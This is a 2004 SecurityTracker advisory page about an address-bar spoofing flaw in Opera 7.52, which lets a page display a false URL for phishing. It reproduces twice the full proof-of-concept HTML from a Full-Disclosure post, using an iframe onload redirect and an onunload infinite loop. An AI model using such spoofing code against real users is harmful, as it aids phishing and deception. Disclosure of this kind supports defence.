SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
(Additional Exploit Code is Available) Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar
SecurityTracker Alert ID:  1010709
SecurityTracker URL:  http://securitytracker.com/id/1010709
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 16 2004
Impact:   Modification of user information
Exploit Included:  Yes  
Version(s): 7.52
Description:   A scripting vulnerability was reported in the Opera browser. A remote user can create HTML that will spoof an arbitrary URL in the status bar.

bitlance winter reported that a remote user can create HTML that, when loaded by the target user, will set the URL in the status bar to an arbitrary URL.

The HTML includes an IFrame within a cascading style sheet definition and a zero second HTML Refresh statement containing a javascript command. The source URL of the iframe will be listed in the address bar. This exploit can be used in "phishing" attacks.

The following demonstration exploit code is provided:

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
[style type="text/css"]
[!-- /* begin */
h1 { font-size:120%;}
h2 { font-size:100%;}
/* end */ --]
[/style]
[script type="text/javascript"]
[!--
function urlfake(){
location.href="http://www.microsoft.com/";
}
function preinline () {
myvar = '[iframe onload="urlfake()" ';
myvar = myvar + 'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/" ';
myvar = myvar + 'frameborder="0" width="760" height="1800" ';
myvar = myvar + 'marginwidth="0" marginheight="0"]';
myvar = myvar + '[' + '/iframe]';
document.write (myvar);
}
// --]
[/script]
[/head]
[body onunload="while(1){};"]
[h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
[h2]Tested on WindowsXP SP1[/h2]
[p]
[script type="text/javascript"]
[!--
preinline ();
// --]
[/script]
[/p]
[/body]
[/html]

Impact:   A remote user can spoof the address bar.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.opera.com/ (Links to External Site)
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 18 2004 Opera Web Browser CSS IFrame Lets Remote Users Spoof the Address Bar



 Source Message Contents

Subject:  [Full-Disclosure] Opera 7.52 (Build 3834) Address Bar Spoofing Issue


Hi List.

A vulnerability is found in the Opera browser version 7.52 , which 
potentially
can be exploited by malicious people to conduct phishing attacks against a 
user.

The issue may be caused due to a race condition and will sometimes
make it possible to display spoofed information in the address bar
via a specially crafted HTML document.

Tested on WindowsXP SP1.

Demonstration HTML source code:

======== begin ========

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[title]Opera 7.52 Address Bar Spoofing Vulnerability[/title]
[style type="text/css"]
[!-- /* begin */
  h1 { font-size:120%;}
  h2 { font-size:100%;}
/* end */ --]
[/style]
[script type="text/javascript"]
[!--
function urlfake(){
location.href="http://www.microsoft.com/";
}
function preinline () {
myvar = '[iframe onload="urlfake()" ';
myvar = myvar +  'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/" ';
myvar = myvar +  'frameborder="0" width="760" height="1800" ';
myvar = myvar +  'marginwidth="0" marginheight="0"]';
myvar = myvar +  '[' + '/iframe]';
document.write (myvar);
}
// --]
[/script]
[/head]
[body onunload="while(1){};"]
[h1]Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue[/h1]
[h2]Tested on WindowsXP SP1[/h2]
[p]
[script type="text/javascript"]
[!--
preinline ();
// --]
[/script]
[/p]
[/body]
[/html]
========= end =========
(Sorry,too long code.)

Thank you, List.

--
bitlance winter

_________________________________________________________________
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC